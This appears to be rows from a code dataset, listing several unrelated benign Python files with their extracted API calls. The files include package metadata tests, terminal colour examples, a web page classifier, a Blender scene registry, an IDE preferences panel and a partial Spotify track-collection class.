code stringlengths 22 1.05M | apis listlengths 1 3.31k | extract_api stringlengths 75 3.25M |
|---|---|---|
# -*- coding: utf-8 -*-
import re
import semantic_version
import pytest
import validators
from datetime import datetime
import quantopian_tools
def test_valid_pkg_name():
    """Package metadata exposes a lowercase, dotted/underscored package name."""
    pkg_name = quantopian_tools.__pkg_name__
    assert quantopian_tools
    assert re.match(r'[a-z][a-z_.]+', pkg_name)
def test_valid_version():
    """The version string can be coerced into a valid semantic version."""
    coerced = semantic_version.Version.coerce(quantopian_tools.__version__)
    assert semantic_version.validate(str(coerced))
def test_valid_release_date():
    """Release date metadata parses as MM/DD/YYYY.

    Improvement: the bare ``pytest.fail()`` gave no hint about which value
    failed; include the offending string in the failure message.
    """
    release_date = quantopian_tools.__release_date__
    try:
        datetime.strptime(release_date, '%m/%d/%Y')
    except ValueError:
        pytest.fail("__release_date__ %r is not in MM/DD/YYYY format" % release_date)
def test_valid_project_name():
    """Project name metadata is set and non-empty."""
    assert quantopian_tools.__project_name__
def test_valid_project_description():
    """Project description metadata is set and non-empty."""
    assert quantopian_tools.__project_description__
def test_valid_project_url():
    """Project URL metadata is a syntactically valid URL."""
    assert validators.url(quantopian_tools.__project_url__)
def test_valid_license():
    """License metadata is exactly 'BSD'."""
    assert quantopian_tools.__license__ == 'BSD'
def test_valid_author():
    """Author is set and the author email is well-formed."""
    assert quantopian_tools.__author__
    assert validators.email(quantopian_tools.__author_email__)
def test_valid_maintainer():
    """Maintainer is set and the maintainer email is well-formed."""
    assert quantopian_tools.__maintainer__
    assert validators.email(quantopian_tools.__maintainer_email__)
| [
"semantic_version.Version.coerce",
"datetime.datetime.strptime",
"re.match",
"validators.email",
"pytest.fail",
"validators.url"
] | [((214, 270), 're.match', 're.match', (['"""[a-z][a-z_.]+"""', 'quantopian_tools.__pkg_name__'], {}), "('[a-z][a-z_.]+', quantopian_tools.__pkg_name__)\n", (222, 270), False, 'import re\n'), ((778, 826), 'validators.url', 'validators.url', (['quantopian_tools.__project_url__'], {}), '(quantopian_tools.__project_url__)\n', (792, 826), False, 'import validators\n'), ((981, 1032), 'validators.email', 'validators.email', (['quantopian_tools.__author_email__'], {}), '(quantopian_tools.__author_email__)\n', (997, 1032), False, 'import validators\n'), ((1118, 1173), 'validators.email', 'validators.email', (['quantopian_tools.__maintainer_email__'], {}), '(quantopian_tools.__maintainer_email__)\n', (1134, 1173), False, 'import validators\n'), ((455, 519), 'datetime.datetime.strptime', 'datetime.strptime', (['quantopian_tools.__release_date__', '"""%m/%d/%Y"""'], {}), "(quantopian_tools.__release_date__, '%m/%d/%Y')\n", (472, 519), False, 'from datetime import datetime\n'), ((341, 402), 'semantic_version.Version.coerce', 'semantic_version.Version.coerce', (['quantopian_tools.__version__'], {}), '(quantopian_tools.__version__)\n', (372, 402), False, 'import semantic_version\n'), ((551, 564), 'pytest.fail', 'pytest.fail', ([], {}), '()\n', (562, 564), False, 'import pytest\n')] |
from garterline import GarterLine
def example1():
    """Build a line with a red 'Hello' segment followed by a blue 'World' one."""
    line = GarterLine()
    for colour, label in (("red", "Hello"), ("blue", "World")):
        line.color(colour)
        line.text(label)
    return line
def example2():
    """Build a blue-on-green line joining words with a shade separator."""
    words = ["In", "other", "words", "it's", "almost", "completed"]
    line = GarterLine()
    line.color("blue", "green")
    line.text(" ░ ".join(words))
    return line
def example3():
    """Render a mock Python error message across progressively lighter segments."""
    line = GarterLine()
    line.color("black", "blue")
    line.text("SyntaxError")
    segments = (
        ("lightblue", "(unicode error) 'unicodeescape'"),
        ("cyan", "codec can't decode bytes in position 0-1"),
        ("lightcyan", "truncated \\uXXXX escape"),
    )
    for bg, label in segments:
        line.color(background=bg)
        line.text(label)
    return line
def clear(msg=""):
    """Return a colour-reset line carrying *msg* (empty string by default)."""
    reset_line = GarterLine().text(msg)
    return reset_line.color()
# (Finnish, roughly: "More booze, the eyes move :)") — original author's joke comment.
# Demo driver: print a header line and each example line to the terminal.
print(clear("GarterLine examples"))
print(example1())
print(example2())
print(example3())
print(clear())
| [
"garterline.GarterLine"
] | [((62, 74), 'garterline.GarterLine', 'GarterLine', ([], {}), '()\n', (72, 74), False, 'from garterline import GarterLine\n'), ((287, 299), 'garterline.GarterLine', 'GarterLine', ([], {}), '()\n', (297, 299), False, 'from garterline import GarterLine\n'), ((418, 430), 'garterline.GarterLine', 'GarterLine', ([], {}), '()\n', (428, 430), False, 'from garterline import GarterLine\n'), ((800, 812), 'garterline.GarterLine', 'GarterLine', ([], {}), '()\n', (810, 812), False, 'from garterline import GarterLine\n')] |
import re
from arqtty_scrapper.page_types import Page_types
class Classifier:
    """Classify a fetched page (Russian-language UI) into a Page_types category.

    Fix: the user-blocked pattern was a plain string containing ``\\w\\W``,
    which is an invalid escape sequence in a non-raw string (DeprecationWarning,
    a SyntaxError in future Python); it is now a raw string.
    """

    def __init__(self, page_str):
        # Raw page text/markup to classify.
        self.page = page_str

    def _is_404(self):
        # Both the "page lost" and "logs recorded" markers must be present.
        marker1 = 'Ой, ой, страничка потерялась'
        marker2 = 'Спокойно! Логи записаны. Все будет исправлено.'
        return re.search(marker1, self.page) and re.search(marker2, self.page)

    def _is_user_blocked(self):
        # Raw string so the \w\W regex escapes reach the re module intact.
        marker1 = r"Пользователь '[\w\W]*' заблокирован"
        return re.search(marker1, self.page)

    def _is_alive(self):
        # The "action feed" header marks a live, accessible page.
        marker1 = 'Лента действий'
        return re.search(marker1, self.page)

    def get_type(self):
        """Return the Page_types value matching the page content."""
        if self._is_404():
            return Page_types.E_404
        elif self._is_user_blocked():
            return Page_types.USER_BANNED
        elif self._is_alive():
            return Page_types.CORRECT
        else:
            return Page_types.UNDEFINED
| [
"re.search"
] | [((468, 497), 're.search', 're.search', (['marker1', 'self.page'], {}), '(marker1, self.page)\n', (477, 497), False, 'import re\n'), ((575, 604), 're.search', 're.search', (['marker1', 'self.page'], {}), '(marker1, self.page)\n', (584, 604), False, 'import re\n'), ((299, 328), 're.search', 're.search', (['marker1', 'self.page'], {}), '(marker1, self.page)\n', (308, 328), False, 'import re\n'), ((333, 362), 're.search', 're.search', (['marker2', 'self.page'], {}), '(marker2, self.page)\n', (342, 362), False, 'import re\n')] |
#!/usr/bin/env python
# Copyright (c) 2020 - for information on the respective copyright owner
# see the NOTICE file and/or the repository
# <https://github.com/boschresearch/amira-blender-rendering>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The scenes module contains scene managers for various setups."""
# base classes
from .basescenemanager import BaseSceneManager # noqa
from .baseconfiguration import BaseConfiguration # noqa
from .threepointlighting import ThreePointLighting # noqa
# composition classes, if inheritance should or cannot be used
from .rendermanager import RenderManager # noqa
# concrete scenes are autoimported later at the end of the file
import os
from functools import partial
from amira_blender_rendering.cli import _auto_import
# Registry populated by register(): scene name -> {'scene'|'config': class}.
_available_scenes = {}
def register(name: str, type: str = None):
    """Register a scene class or its configuration class under *name*.

    Intended to be used as a class decorator::

        @register(name='awesome_sauce', type='scene')
        class AnotherClass(MyClass):
            ...

    The name should be unique for the scene type that is being registered.

    Args:
        name(str): Name for the scene to register
        type(str): Either 'scene' or 'config' depending whether the actual scene
            class or the corresponding configuration class is registered

    Returns:
        The class that was passed as argument.

    Raises:
        ValueError: if invalid name/type given.
    """
    def _register(obj, name, obj_type):
        if obj_type not in ('scene', 'config'):
            raise ValueError(f'Requested type {obj_type} is not available')
        if name is None:
            raise ValueError(f'Provide an appropriate name for the current scene of type {obj.__name__.lower()}')
        # setdefault creates the per-name entry on first registration.
        entry = _available_scenes.setdefault(name, dict())
        entry[obj_type] = obj
        return obj
    return partial(_register, name=name, obj_type=type)
def get_registered(name: str = None):
    """
    Return dictionary of available classes/function type registered via register(name, type)

    Args:
        name(str): name of registered object to query

    Raises:
        ValueError: if *name* is not a registered scene name.
    """
    registry = _available_scenes
    if name is None:
        return registry
    if name in registry:
        return registry[name]
    raise ValueError(f'Queried type "{name}" not among availables: {list(registry.keys())}')
# Import every module in this package so concrete scenes run their @register decorators.
_auto_import(pkgname=__name__, dirname=os.path.dirname(__file__), subdirs=[''])
| [
"os.path.dirname",
"functools.partial"
] | [((2503, 2547), 'functools.partial', 'partial', (['_register'], {'name': 'name', 'obj_type': 'type'}), '(_register, name=name, obj_type=type)\n', (2510, 2547), False, 'from functools import partial\n'), ((3036, 3061), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (3051, 3061), False, 'import os\n')] |
#
# sn_agent/base.py - implementation of abstract class defining API for Network
# communication with block-chain implementations through connections with
# smart contracts and block-chain messaging systems.
#
# Copyright (c) 2017 SingularityNET
#
# Distributed under the MIT software license, see LICENSE file.
#
from sn_agent.agent.base import AgentABC
from sn_agent.network.enum import NetworkStatus
from sn_agent.ontology.service_descriptor import ServiceDescriptor
from enum import Enum
import logging
from sn_agent.agent.base import AgentABC
# Module-level logger, named after this module per the getLogger(__name__) convention.
logger = logging.getLogger(__name__)
class TestAgent(AgentABC):
    """Minimal agent used for testing; its service hooks are intentionally no-ops."""

    def __init__(self, app, agent_id):
        super().__init__(app, agent_id)
        logger.debug('Test Agent Started')

    def can_perform(self, service: ServiceDescriptor) -> bool:
        """No-op capability check (returns None)."""

    def perform(self, service: ServiceDescriptor) -> bool:
        """No-op service execution (returns None)."""
| [
"logging.getLogger"
] | [((561, 588), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (578, 588), False, 'import logging\n')] |
from noval import GetApp,_
import noval.iface as iface
import noval.plugin as plugin
import tkinter as tk
from tkinter import ttk,messagebox
import noval.preference as preference
from noval.util import utils
import noval.ui_utils as ui_utils
import noval.consts as consts
# Upper bound for the "window menu display number" preference.
# NOTE(review): currently only referenced from the commented-out legacy wx code below.
MAX_WINDOW_MENU_NUM_ITEMS = 30
##class WindowMenuService(wx.lib.pydocview.WindowMenuService):
## """description of class"""
## def InstallControls(self, frame, menuBar=None, toolBar=None, statusBar=None, document=None):
## wx.lib.pydocview.WindowMenuService.InstallControls(self,frame,menuBar,toolBar,statusBar,document)
## windowMenu = menuBar.GetWindowsMenu()
## windowMenu.Append(constants.ID_CLOSE_ALL,_("Close All"),_("Close all open documents"))
## wx.EVT_MENU(frame, constants.ID_CLOSE_ALL, frame.ProcessEvent)
##
## if wx.GetApp().GetUseTabbedMDI():
## windowMenu.Append(constants.ID_RESTORE_WINDOW_LAYOUT,_("&Restore Default Layout"),_("Restore default layout of main frame"))
## wx.EVT_MENU(frame, constants.ID_RESTORE_WINDOW_LAYOUT, frame.ProcessEvent)
## wx.EVT_MENU(frame, self.SELECT_MORE_WINDOWS_ID, frame.ProcessEvent)
##
## def ProcessEvent(self, event):
## """
## Processes a Window menu event.
## """
## id = event.GetId()
## if id == constants.ID_RESTORE_WINDOW_LAYOUT:
## ret = wx.MessageBox(_("Are you sure want to restore the default window layout?"), wx.GetApp().GetAppName(),
## wx.YES_NO | wx.ICON_QUESTION,wx.GetApp().MainFrame)
## if ret == wx.YES:
## wx.GetApp().MainFrame.LoadDefaultPerspective()
## return True
## elif id == constants.ID_CLOSE_ALL:
## wx.GetApp().MainFrame.OnCloseAllDocs(event)
## return Truefrom noval.util import utils
## else:
## return wx.lib.pydocview.WindowMenuService.ProcessEvent(self,event)
##
##
## def BuildWindowMenu(self, currentFrame):
## """
## Builds the Window menu and adds menu items for all of the open documents in the DocManager.
## """
## if wx.GetApp().GetUseTabbedMDI():
## currentFrame = wx.GetApp().GetTopWindow()
##
## windowMenuIndex = currentFrame.GetMenuBar().FindMenu(_("&Window"))
## windowMenu = currentFrame.GetMenuBar().GetMenu(windowMenuIndex)
##
## if wx.GetApp().GetUseTabbedMDI():
## notebook = wx.GetApp().GetTopWindow()._notebook
## numPages = notebook.GetPageCount()
##
## for id in self._selectWinIds:
## item = windowMenu.FindItemById(id)
## if item:
## windowMenu.DeleteItem(item)
##
## if windowMenu.FindItemById(self.SELECT_MORE_WINfrom noval.util import utilsDOWS_ID):
## windowMenu.Remove(self.SELECT_MORE_WINDOWS_ID)
## if numPages == 0 and self._sep:
## windowMenu.DeleteItem(self._sep)
## self._sep = None
##
## if numPages > len(self._selectWinIds):
## for i in range(len(self._selectWinIds), numPages):
## self._selectWinIds.append(wx.NewId())
## wx.EVT_MENU(currentFrame, self._selectWinIds[i], self.OnCtrlKeySelect)
##
## for i in range(0, min(numPages,utils.ProfileGetInt("WindowMenuDisplayNumber",wx.lib.pydocview.WINDOW_MENU_NUM_ITEMS))):
## if i == 0 and not self._sep:
## self._sep = windowMenu.AppendSeparator()
## if i < 9:
## menuLabel = "%s\tCtrl+%s" % (notebook.GetPageText(i), i+1)
## else:from noval.util import utils
## menuLabel = notebook.GetPageText(i)
## windowMenu.Append(self._selectWinIds[i], menuLabel)
##
## if numPages > wx.lib.pydocview.WINDOW_MENU_NUM_ITEMS: # Add the more items item
## if not windowMenu.FindItemById(self.SELECT_MORE_WINDOWS_ID):
## windowMenu.Append(self.SELECT_MORE_WINDOWS_ID, _("&More Windows..."))
##
##
## def _GetWindowMenuFrameList(self, currentFrame=None):
## """
## Returns the Frame associated with each menu item in the Window menu.
## """
## frameList = []
## # get list of windows for documents
## for doc in self._docManager.GetDocuments():
## for view in doc.GetViews():
## if hasattr(view,"GetType"):
## frame = view.GetFrame()
## if frame not in frameList:
## if frame == currentFrame and len(framimport noval.preference as preferenceeList) >= WINDOW_MENU_NUM_ITEMS:
## frameList.insert(WINDOW_MENU_NUM_ITEMS - 1, frame)
## else:
## frameList.append(frame)
## return frameList
##
## def OnSelectMoreWindows(self, event):
## """
## Called when the "Window/Select More Windows..." menu item is selected and enables user to
## select from the Frames that do not in the Window list. Useful when there are more than
## 10 open frames in the application.
## """
## frames = self._GetWindowMenuFrameList() # TODO - make the current window the first one
## strings = map(lambda frame: frame.GetTitle(), frames)
## # Should preselect the current window, but not supported by wx.GetSingleChoice
## res = wx.GetSingleChoiceIndex(_("Select a window to show:"),
## _("Select Window"),
## strings,
## wx.GetApp().MainFrame)
## if res == -1:
## return
## frames[res].SetFocus()
##
class WindowsOptionPanel(ui_utils.CommonOptionPanel):
    """Preference panel for window behaviour: startup layout, menubar and UI scaling.
    """
    def __init__(self, parent):
        ui_utils.CommonOptionPanel.__init__(self, parent)
        # Restore the previous window layout at startup (default: enabled).
        self._loadLayoutCheckVar = tk.IntVar(value=utils.profile_get_int("LoadLastPerspective", True))
        loadLayoutCheckBox = ttk.Checkbutton(self.panel, text=_("Load the last window layout at start up"),variable=self._loadLayoutCheckVar)
        loadLayoutCheckBox.pack(fill=tk.X)
        # Legacy wxPython widgets (window-menu item count) kept for reference:
##        self._window_menu_display_number_ctrl = wx.TextCtrl(self, -1, str(config.ReadInt("WindowMenuDisplayNumber",wx.lib.pydocview.WINDOW_MENU_NUM_ITEMS)), size=(30,-1),\
##                                                          validator=NumValidator(_("Window Menu Display Number"),1,MAX_WINDOW_MENU_NUM_ITEMS))
##        lsizer.AddMany([(wx.StaticText(self, label=_("Number of Window menus displayed") + "(%d-%d): " % \
##                                       (1,MAX_WINDOW_MENU_NUM_ITEMS)),
##                          0, wx.ALIGN_CENTER_VERTICAL), ((5, 5), 0),
##                        (self._window_menu_display_number_ctrl,
##                         0, wx.ALIGN_CENTER_VERTICAL)])
        # Hide the menubar while in full-screen mode (default: disabled).
        self._hideMenubarCheckVar = tk.IntVar(value=utils.profile_get_int("HideMenubarFullScreen", False))
        hideMenubarCheckBox = ttk.Checkbutton(self.panel, text= _("Hide menubar When full screen display"),variable=self._hideMenubarCheckVar)
        hideMenubarCheckBox.pack(fill=tk.X)
        # Replace the native menubar with the application's custom one (default: disabled).
        self._useCustommenubarCheckVar = tk.IntVar(value=utils.profile_get_int("USE_CUSTOM_MENUBAR", False))
        useCustommenubarCheckBox = ttk.Checkbutton(self.panel, text= _("Use custom menubar"),variable=self._useCustommenubarCheckVar)
        useCustommenubarCheckBox.pack(fill=tk.X)
        # UI scale selector: label + read-only combobox of preset factors.
        row = ttk.Frame(self.panel)
        self._scaling_label = ttk.Label(row, text=_("UI scaling factor:"))
        self._scaling_label.pack(fill=tk.X,side=tk.LEFT)
        # Empty string means "no explicit factor"; OnOK stores "default" in that case.
        self._scaleVar = tk.StringVar(value=utils.profile_get('UI_SCALING_FACTOR',''))
        scalings = sorted({0.5, 0.75, 1.0, 1.25, 1.33, 1.5, 2.0, 2.5, 3.0, 4.0})
        combobox = ttk.Combobox(
            row,
            exportselection=False,
            textvariable=self._scaleVar,
            state="readonly",
            height=15,
            values=tuple(scalings),
        )
        combobox.pack(fill=tk.X,side=tk.LEFT)
        row.pack(fill=tk.X)
        # Button wiping the stored window perspectives (see ClearWindowLayoutConfiguration).
        clear_window_layout_btn = ttk.Button(self.panel, text=_("Clear Window layout configuration information"),command=self.ClearWindowLayoutConfiguration)
        clear_window_layout_btn.pack(anchor=tk.W,pady=consts.DEFAUT_HALF_CONTRL_PAD_Y)
    def OnOK(self, optionsDialog):
        """Persist the selected options; warn about settings needing a restart.

        Returns True so the options dialog can proceed.
        """
        # Scale and custom-menubar changes only take effect after a restart — tell the user.
        if utils.profile_get('UI_SCALING_FACTOR','') != self._scaleVar.get():
            messagebox.showinfo(GetApp().GetAppName(),_("Scale changes will not appear until the application is restarted."),parent=self)
        if utils.profile_get_int('USE_CUSTOM_MENUBAR',0) != self._useCustommenubarCheckVar.get():
            messagebox.showinfo(GetApp().GetAppName(),_("Menubar changes will not appear until the application is restarted."),parent=self)
        utils.profile_set("LoadLastPerspective", self._loadLayoutCheckVar.get())
        utils.profile_set("HideMenubarFullScreen", self._hideMenubarCheckVar.get())
        utils.profile_set("USE_CUSTOM_MENUBAR", self._useCustommenubarCheckVar.get())
        scale = self._scaleVar.get()
        if not scale:
            # Empty selection is stored as the sentinel value "default".
            scale = "default"
        utils.profile_set("UI_SCALING_FACTOR", scale)
       # config.WriteInt("WindowMenuDisplayNumber", int(self._window_menu_display_number_ctrl.GetValue()))
        return True
    def ClearWindowLayoutConfiguration(self):
        """Delete the stored window perspectives and confirm to the user."""
        config = GetApp().GetConfig()
        config.DeleteEntry("DefaultPerspective")
        config.DeleteEntry("LastPerspective")
        messagebox.showinfo(GetApp().GetAppName(),_("Already Clear Window layout configuration information"))
class WindowServiceLoader(plugin.Plugin):
    """Plugin that hooks the windows preference panel into the preference manager."""
    # Declares which plugin interface this class implements.
    plugin.Implements(iface.CommonPluginI)
    def Load(self):
        # Register the panel under Environment -> Appearance in the preferences dialog.
        preference.PreferenceManager().AddOptionsPanelClass(preference.ENVIRONMENT_OPTION_NAME,"Appearance",WindowsOptionPanel)
| [
"tkinter.ttk.Frame",
"noval.plugin.Implements",
"noval.GetApp",
"noval._",
"noval.util.utils.profile_set",
"noval.preference.PreferenceManager",
"noval.util.utils.profile_get_int",
"noval.ui_utils.CommonOptionPanel.__init__",
"noval.util.utils.profile_get"
] | [((10114, 10152), 'noval.plugin.Implements', 'plugin.Implements', (['iface.CommonPluginI'], {}), '(iface.CommonPluginI)\n', (10131, 10152), True, 'import noval.plugin as plugin\n'), ((6137, 6186), 'noval.ui_utils.CommonOptionPanel.__init__', 'ui_utils.CommonOptionPanel.__init__', (['self', 'parent'], {}), '(self, parent)\n', (6172, 6186), True, 'import noval.ui_utils as ui_utils\n'), ((7816, 7837), 'tkinter.ttk.Frame', 'ttk.Frame', (['self.panel'], {}), '(self.panel)\n', (7825, 7837), False, 'from tkinter import ttk, messagebox\n'), ((9585, 9630), 'noval.util.utils.profile_set', 'utils.profile_set', (['"""UI_SCALING_FACTOR"""', 'scale'], {}), "('UI_SCALING_FACTOR', scale)\n", (9602, 9630), False, 'from noval.util import utils\n'), ((8756, 8798), 'noval.util.utils.profile_get', 'utils.profile_get', (['"""UI_SCALING_FACTOR"""', '""""""'], {}), "('UI_SCALING_FACTOR', '')\n", (8773, 8798), False, 'from noval.util import utils\n'), ((8988, 9034), 'noval.util.utils.profile_get_int', 'utils.profile_get_int', (['"""USE_CUSTOM_MENUBAR"""', '(0)'], {}), "('USE_CUSTOM_MENUBAR', 0)\n", (9009, 9034), False, 'from noval.util import utils\n'), ((9996, 10054), 'noval._', '_', (['"""Already Clear Window layout configuration information"""'], {}), "('Already Clear Window layout configuration information')\n", (9997, 10054), False, 'from noval import GetApp, _\n'), ((6249, 6299), 'noval.util.utils.profile_get_int', 'utils.profile_get_int', (['"""LoadLastPerspective"""', '(True)'], {}), "('LoadLastPerspective', True)\n", (6270, 6299), False, 'from noval.util import utils\n'), ((6364, 6408), 'noval._', '_', (['"""Load the last window layout at start up"""'], {}), "('Load the last window layout at start up')\n", (6365, 6408), False, 'from noval import GetApp, _\n'), ((7242, 7295), 'noval.util.utils.profile_get_int', 'utils.profile_get_int', (['"""HideMenubarFullScreen"""', '(False)'], {}), "('HideMenubarFullScreen', False)\n", (7263, 7295), False, 'from noval.util import utils\n'), 
((7362, 7404), 'noval._', '_', (['"""Hide menubar When full screen display"""'], {}), "('Hide menubar When full screen display')\n", (7363, 7404), False, 'from noval import GetApp, _\n'), ((7554, 7604), 'noval.util.utils.profile_get_int', 'utils.profile_get_int', (['"""USE_CUSTOM_MENUBAR"""', '(False)'], {}), "('USE_CUSTOM_MENUBAR', False)\n", (7575, 7604), False, 'from noval.util import utils\n'), ((7676, 7699), 'noval._', '_', (['"""Use custom menubar"""'], {}), "('Use custom menubar')\n", (7677, 7699), False, 'from noval import GetApp, _\n'), ((7889, 7912), 'noval._', '_', (['"""UI scaling factor:"""'], {}), "('UI scaling factor:')\n", (7890, 7912), False, 'from noval import GetApp, _\n'), ((8017, 8059), 'noval.util.utils.profile_get', 'utils.profile_get', (['"""UI_SCALING_FACTOR"""', '""""""'], {}), "('UI_SCALING_FACTOR', '')\n", (8034, 8059), False, 'from noval.util import utils\n'), ((8514, 8564), 'noval._', '_', (['"""Clear Window layout configuration information"""'], {}), "('Clear Window layout configuration information')\n", (8515, 8564), False, 'from noval import GetApp, _\n'), ((8878, 8948), 'noval._', '_', (['"""Scale changes will not appear until the application is restarted."""'], {}), "('Scale changes will not appear until the application is restarted.')\n", (8879, 8948), False, 'from noval import GetApp, _\n'), ((9130, 9202), 'noval._', '_', (['"""Menubar changes will not appear until the application is restarted."""'], {}), "('Menubar changes will not appear until the application is restarted.')\n", (9131, 9202), False, 'from noval import GetApp, _\n'), ((9827, 9835), 'noval.GetApp', 'GetApp', ([], {}), '()\n', (9833, 9835), False, 'from noval import GetApp, _\n'), ((10183, 10213), 'noval.preference.PreferenceManager', 'preference.PreferenceManager', ([], {}), '()\n', (10211, 10213), True, 'import noval.preference as preference\n'), ((9974, 9982), 'noval.GetApp', 'GetApp', ([], {}), '()\n', (9980, 9982), False, 'from noval import GetApp, _\n'), 
((8856, 8864), 'noval.GetApp', 'GetApp', ([], {}), '()\n', (8862, 8864), False, 'from noval import GetApp, _\n'), ((9108, 9116), 'noval.GetApp', 'GetApp', ([], {}), '()\n', (9114, 9116), False, 'from noval import GetApp, _\n')] |
"""
This module is the main API used to create track collections
"""
# Standard library imports
import copy
import random
import inspect
import logging
import itertools
from typing import Any
from typing import List
from typing import Union
from typing import Tuple
from typing import Callable
from dataclasses import dataclass, field, asdict
# Third party imports
import numpy as np
import pandas as pd
import networkx as nx
# Local imports
import spotify_flows.database as database
from .login import login
from .data_structures import (
EpisodeItem,
SpotifyDataStructure,
TrackItem,
AudioFeaturesItem,
)
from .tracks import get_track_id, read_track_from_id
from .tracks import get_audio_features
from .albums import get_album_id
from .albums import get_album_songs
from .podcasts import get_show_id
from .podcasts import get_show_episodes
from .user import get_all_saved_tracks
from .user import get_recommendations_for_genre
from .artists import get_artist_id
from .artists import get_artist_albums
from .artists import get_related_artists
from .artists import get_artist_popular_songs
from .playlists import get_playlist_id
from .playlists import make_new_playlist
from .playlists import get_playlist_tracks
# Main body
# NOTE(review): getLogger() with no argument returns the ROOT logger;
# getLogger(__name__) is the usual convention — confirm this is intended.
logger = logging.getLogger()
class DatabaseNotLoaded(Exception):
    """Raised when a database-backed operation is attempted before a database is loaded."""
@dataclass
class TrackCollection:
    """Class representing a collection of tracks. Can be chained together through a
    variety of defined methods."""

    # Strategy used by from_db() to rebuild a stored collection from its id.
    read_items_from_db = lambda id_, db: db.build_collection_from_collection_id(id_=id_)
    # NOTE(review): login() runs once at class-creation (module import) time,
    # performing authentication as a side effect — confirm this is intended.
    sp = login(
        scope="playlist-modify-private playlist-modify-public user-read-playback-position user-library-read"
    )
    id_: str = ""  # collection identifier (playlist/album/artist/... id)
    info: SpotifyDataStructure = None  # optional metadata payload for the collection
    _items: List[Any] = field(default_factory=list)  # materialized items, or a generator
    _audio_features_enriched: bool = False  # True once items carry audio_features
    def copy(self):
        # Shallow copy; a generator-backed _items is shared with the copy.
        return copy.copy(self)

    @property
    def _api_track_gen(self):
        # Yield the raw track dicts already held in memory (fetched via the API).
        yield from self._items

    @property
    def _db_track_gen(self):
        # Stream tracks for this collection id from the local database.
        # NOTE(review): CollectionDatabase is not among this module's visible
        # imports — presumably defined later in the file; verify.
        db = CollectionDatabase()
        return db.load_playlist(playlist_id=self.id_)

    @property
    def exist_in_db(self):
        # True only when a database is loaded AND it knows this collection id.
        db = CollectionDatabase()
        return db.playlist_exists(self.id_) if db.is_loaded() else False

    @property
    def items(self):
        # Unified access point: prefer in-memory items, else resolve by id, else empty.
        if self._items:
            yield from self._items
        else:
            if self.id_:
                yield from self.item_gen()
            else:
                yield from iter(())

    def item_gen(self):
        # Prefer the database copy; otherwise fetch via the API, caching each
        # track into the database as it streams past (when a DB is loaded).
        db = CollectionDatabase()
        if self.exist_in_db:
            yield from self._db_track_gen
        else:
            logger.info(f"Retrieving items via API")
            for track_dict in self._api_track_gen:
                track = TrackItem.from_dict(track_dict)
                if db.is_loaded():
                    db.add_track(track_item=track)
                yield track
    @classmethod
    def from_id(cls, id_: str):
        # Lazy constructor: items resolve on first iteration via item_gen().
        return cls(id_=id_)

    @classmethod
    def from_item(cls, id_: str, item: SpotifyDataStructure):
        # Attach a pre-built metadata item alongside the id.
        return cls(id_=id_, info=item)

    @classmethod
    def from_db(cls, id_: str, db_path: str):
        # Rebuild a stored collection from a database file.
        # NOTE(review): always returns the base TrackCollection, not cls — confirm.
        db = database.SpotifyDatabase(db_path, op_table="table")
        items = cls.read_items_from_db(id_=id_, db=db)
        return TrackCollection(id_=id_, _items=items)

    @classmethod
    def from_name(cls, name: str):
        # Underscores in the name act as spaces before the id lookup.
        # NOTE(review): func_get_id is not defined on this class in the visible
        # code — presumably supplied by subclasses; verify.
        name = name.replace("_", " ")
        id_ = cls.func_get_id(name=name)
        return cls(id_=id_)

    def __str__(self) -> str:
        # One line per track; iterating may trigger API/database fetches.
        return "\n".join([str(item) for item in self.items])
    def __add__(self, other: "TrackCollection") -> "TrackCollection":
        """Defines the addition of two collections. Items get concatenated.

        Returns:
            TrackCollection: Collection object with combined items
        """
        def new_items():
            yield from self.items
            yield from other.items

        # The result counts as enriched only when both operands already are.
        enriched = (self._audio_features_enriched) and (other._audio_features_enriched)
        return TrackCollection(
            id_="", _items=new_items(), _audio_features_enriched=enriched
        )

    def __radd__(self, other: "TrackCollection") -> "TrackCollection":
        """Used when building track collections from list of other track collections

        Returns:
            TrackCollection: Sum of two collections
        """
        # sum() seeds with 0; treat that seed as the identity element.
        if other == 0:
            return self
        else:
            return self + other

    def __sub__(self, other: "TrackCollection") -> "TrackCollection":
        """Defines the subtraction of two collections. Items from other get removed from items from self.

        Returns:
            TrackCollection: Collection object with modified items.
        """
        # Materialize the subtrahend once; each membership test is O(len(other)).
        other_items = list(other.items)

        def new_items():
            for item in self.items:
                if item not in other_items:
                    yield item

        enriched = self._audio_features_enriched
        return TrackCollection(
            id_="", _items=new_items(), _audio_features_enriched=enriched
        )

    def __truediv__(self, other: "TrackCollection") -> "TrackCollection":
        """Defines the division of two collections.

        Returns:
            TrackCollection: Items are intersection of self and other
        """
        other_items = list(other.items)

        def new_items():
            # Keep only tracks also present in `other`; order of self preserved.
            for item in self.items:
                if item in other_items:
                    yield item

        enriched = self._audio_features_enriched
        return TrackCollection(
            id_="", _items=new_items(), _audio_features_enriched=enriched
        )

    def __mod__(self, other: "TrackCollection") -> "TrackCollection":
        """Defines the modulo of two collections

        Returns:
            TrackCollection: Items are alternates of self and other.
        """
        def new_items():
            # zip stops at the shorter stream: surplus tracks are dropped.
            for i, j in zip(self.items, other.items):
                yield i
                yield j

        enriched = (self._audio_features_enriched) and (other._audio_features_enriched)
        return TrackCollection(_items=new_items(), _audio_features_enriched=enriched)
    def to_dataframes(self) -> Tuple[pd.DataFrame]:
        """Transforms items into dataframes, used for storage in database.

        Returns:
            Tuple[pd.DataFrame]: (tracks, artists, albums, audio_features,
            album_artist link table) — in that order.
        """
        # Enrich with audio features; tracks are dataclass instances, so asdict works.
        tracks = copy.copy(list(self.add_audio_features().items))
        # Extract data: album<->artist link rows, then flat dict views of each entity.
        album_artist = [
            {"album_id": track.album.id, "artist_id": artist.id}
            for track in tracks
            for artist in track.album.artists
        ]
        all_tracks = [asdict(track) for track in tracks]
        all_audio_features = [
            {"track_id": track["id"], **track["audio_features"]} for track in all_tracks
        ]
        all_albums = [asdict(track.album) for track in tracks]
        all_artists = [artist for album in all_albums for artist in album["artists"]]
        # Build dataframes; nested structures are dropped/flattened into id columns.
        df_all_artists = pd.DataFrame(all_artists)
